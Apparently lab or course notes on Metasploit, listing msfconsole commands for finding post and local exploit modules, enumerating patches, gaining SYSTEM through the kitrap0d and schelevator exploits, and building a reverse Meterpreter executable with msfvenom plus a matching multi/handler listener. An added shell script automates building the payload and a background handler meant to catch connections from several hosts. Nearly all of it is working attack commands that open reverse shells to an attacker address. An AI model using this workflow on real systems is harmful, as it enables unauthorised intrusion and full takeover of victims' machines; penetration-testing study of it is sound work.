msfconsole commands we used include:
Search for modules that affect the Windows platform and have the type post:
search type:post platform:windows
Search for modules that affect the Windows platform, have the type exploit and live under the local path (privilege-escalation exploits that run through an already established session):
search type:exploit platform:windows path:local
List all background sessions:
sessions -l
Restore (interact with) a background session by id:
sessions -i #
Use this module to enumerate the patches installed on the target host (and so work out which ones are missing). Post modules need an established session to run against; this appears as the SESSION option in 'show options', where SESSION is the id of the established session.
use post/windows/gather/enum_patches
set SESSION 1
run
Use the 'kitrap0d' exploit (MS10-015, 32-bit Windows only) to get SYSTEM level privileges on the Windows box. Local exploits take the existing session as SESSION and have no RHOST; LHOST and LPORT are the address and port on the attacking machine that the new reverse_tcp Meterpreter session connects back to.
info exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.160.110
set LPORT 7479
exploit
Use the 'schelevator' exploit (MS10-092, Windows Task Scheduler) to run a scheduled task as SYSTEM and start a reverse tcp Meterpreter shell with those privileges. The options are the same as for kitrap0d: SESSION for the existing session, LHOST/LPORT for the reverse connection.
info exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms10_092_schelevator
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.160.110
set LPORT 7478
exploit
Generate a reverse Meterpreter payload with msfvenom (Kali 2). The executable is written under the web root so it can be served to the target; when executed on the target it connects back to LHOST:LPORT and starts a reverse tcp session.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.168.110 LPORT=7477 -f exe -o /var/www/html/payload.exe
For that session to connect you need a listener waiting on your Kali instance. The payload, LHOST and LPORT set here must match what was given to msfvenom, otherwise the connection is dropped or the stager fails.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.168.110
set LPORT 7477
exploit
Steps to get a meterpreter shell
- deliver a payload
  - use an exploit to have msfconsole drop and execute the payload, or
  - manually create the payload, then find a way to get it onto the target and executed.
- listen for the reverse tcp shell connection
  - if you use an exploit, this is taken care of for you.
  - if you manually drop the payload, use the exploit/multi/handler module to listen for incoming connections.
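The manual route above (msfvenom payload plus multi/handler) fails most often because the payload, LHOST or LPORT differ between the two commands. The script below is an added example, not part of the original notes: it takes one set of values (defaulting to the ones used on this page, overridable via the environment) and produces both the msfvenom command line and an msfconsole resource script for the matching handler. The resource file path /tmp/handler.rc and the ExitOnSession / -j -z handler settings are my choices, not the page's.

```shell
#!/bin/sh
# Added example: derive the msfvenom command and a multi/handler resource
# script from ONE set of values so the payload, LHOST and LPORT can never
# disagree between the executable and the listener.
set -eu

LHOST="${LHOST:-192.168.168.110}"        # attacker (Kali) address the target connects back to
LPORT="${LPORT:-7477}"                   # port the handler listens on
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
OUT="${OUT:-/var/www/html/payload.exe}"  # under the web root so the target can fetch it
RC="${RC:-/tmp/handler.rc}"              # resource script for msfconsole -r (assumed path)

# Print the msfvenom command line that builds the executable.
venom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' \
    "$PAYLOAD" "$LHOST" "$LPORT" "$OUT"
}

# Write an msfconsole resource script that starts multi/handler with the
# same values. ExitOnSession false together with exploit -j -z keeps the
# handler running as a background job so it can catch more than one
# connection (e.g. if the payload is executed on several hosts).
write_handler_rc() {
  rc="$1"
  cat > "$rc" <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
}

write_handler_rc "$RC"
echo "Handler resource script written to $RC; start it with: msfconsole -q -r $RC"
echo "Payload build command:"
venom_cmd
# Only build the executable when msfvenom is actually installed.
if command -v msfvenom >/dev/null 2>&1; then
  sh -c "$(venom_cmd)"
fi
```

Start the listener first with `msfconsole -q -r /tmp/handler.rc`, then deliver payload.exe to the target; because the handler is a background job, the console stays usable and `sessions -l` shows each connection as it arrives.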
Exploit vs Payload?